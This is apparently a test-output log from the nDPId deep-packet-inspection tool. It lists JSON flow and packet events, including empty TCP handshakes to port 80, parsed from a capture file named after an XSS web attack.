-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2292,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347124454,"flow_last_seen":1499347129648,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347242051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347243333,"flow_last_seen":1499347243333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347243333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1499347243333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347243333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87MZAAD4G2QmsEAABwKgKMtdOAFA1pxnaAAAAAKACchBBjgAAAgQFtAQCCAoBOfUcAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1499347243333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347243333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ104lyvYYNacZ26AScSBcFAAAAgQFtAQCCAoD48aSATn1HAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1499347243334,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347243334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07MdAAD4G2RCsEAABwKgKMtdOAFA1pxnbJcr2GYAQAOX7GwAAAQEICgE59RwD48aS"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347244580,"flow_last_seen":1499347244580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347244580,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1499347244580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347244580,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UrJAAD4Gcx6sEAABwKgKMtdcAFCKtaTmAAAAAKACchBgLQAAAgQFtAQCCAoBOfZUAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":2,"flow_last_seen":1499347244580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347244580,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ11yGUuJUirWk56AScSAstwAAAgQFtAQCCAoD48fKATn2VAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":3,"flow_last_seen":1499347244581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347244581,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UrNAAD4GcyWsEAABwKgKMtdcAFCKtaTnhlLiVYAQAOXLvgAAAQEICgE59lQD48fK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347247114,"flow_last_seen":1499347247114,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347247114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55158,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1499347247114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347247114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GLNAAD4GrR2sEAABwKgKMtd2AFApn+B+AAAAAKACchCDGAAAAgQFtAQCCAoBOfjNAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":2,"flow_last_seen":1499347247114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347247114,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ13ZCBl2jKZ\/gf6AScSAWJgAAAgQFtAQCCAoD48pEATn4zQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":3,"flow_last_seen":1499347247115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347247115,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GLRAAD4GrSSsEAABwKgKMtd2AFApn+B\/QgZdpIAQAOW1LAAAAQEICgE5+M4D48pE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347248373,"flow_last_seen":1499347248373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347248373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2337,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1499347248373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347248373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JiRAAD4Gn6ysEAABwKgKMteEAFBjB9wsAAAAAKACchBMuQAAAgQFtAQCCAoBOfoIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2338,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":2,"flow_last_seen":1499347248373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347248373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ14RKuW9xYwfcLaAScSDECwAAAgQFtAQCCAoD48t+ATn6CAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":3,"flow_last_seen":1499347248374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347248374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JiVAAD4Gn7OsEAABwKgKMteEAFBjB9wtSrlvcoAQAOVjEgAAAQEICgE5+gkD48t+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347249651,"flow_last_seen":1499347249651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347249651,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55186,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1499347249651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347249651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ostAAD4GIwWsEAABwKgKMteSAFAC31mDAAAAAKACchAuPQAAAgQFtAQCCAoBOftIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":2,"flow_last_seen":1499347249652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347249652,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ15JGEK8pAt9ZhKAScSBpQAAAAgQFtAQCCAoD48y+ATn7SAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":3,"flow_last_seen":1499347249652,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347249652,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0osxAAD4GIwysEAABwKgKMteSAFAC31mERhCvKoAQAOUISAAAAQEICgE5+0gD48y+"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347252179,"flow_last_seen":1499347252179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252179,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1499347252179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347252179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86Q5AAD4G3MGsEAABwKgKMtesAFDOJxTOAAAAAKACchClFwAAAgQFtAQCCAoBOf3AAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":2,"flow_last_seen":1499347252179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347252179,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ16ypaMjNzicUz6AScSBgpgAAAgQFtAQCCAoD4882ATn9wAEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2369,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":3,"flow_last_seen":1499347252180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347252180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06Q9AAD4G3MisEAABwKgKMtesAFDOJxTPqWjIzoAQAOX\/rQAAAQEICgE5\/cAD4882"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347125743,"flow_last_seen":1499347131649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347128311,"flow_last_seen":1499347133649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347129584,"flow_last_seen":1499347134649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347132137,"flow_last_seen":1499347137650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2376,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347133434,"flow_last_seen":1499347138651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347252685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347253445,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347253445,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55226,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uoZAAD4GC0qsEAABwKgKMte6AFBXtER6AAAAAKACchDqlAAAAgQFtAQCCAoBOf78AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347253445,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ17p5Tes0V7REe6AScSCymwAAAgQFtAQCCAoD49ByATn+\/AEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2381,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1499347253445,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347253445,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uodAAD4GC1GsEAABwKgKMte6AFBXtER7eU3rNYAQAOVRowAAAQEICgE5\/vwD49By"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347254714,"flow_last_seen":1499347254714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347254714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55240,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2394,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1499347254714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347254714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sPBAAD4GFOCsEAABwKgKMtfIAFAvObDJAAAAAKACchCldQAAAgQFtAQCCAoBOgA5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2395,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1499347254714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347254714,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ18hpS4YpLzmwyqAScSDhSwAAAgQFtAQCCAoD49GwAToAOQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1499347254715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347254715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sPFAAD4GFOesEAABwKgKMtfIAFAvObDKaUuGKoAQAOWAUgAAAQEICgE6ADoD49Gw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347257224,"flow_last_seen":1499347257224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347257224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1499347257224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347257224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MIRAAD4GlUysEAABwKgKMtfiAFCgDzIpAAAAAKACchCwsQAAAgQFtAQCCAoBOgKtAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":2,"flow_last_seen":1499347257224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347257224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1+LmPUR7oA8yKqAScSCu0AAAAgQFtAQCCAoD49QjAToCrQEDAwc="} 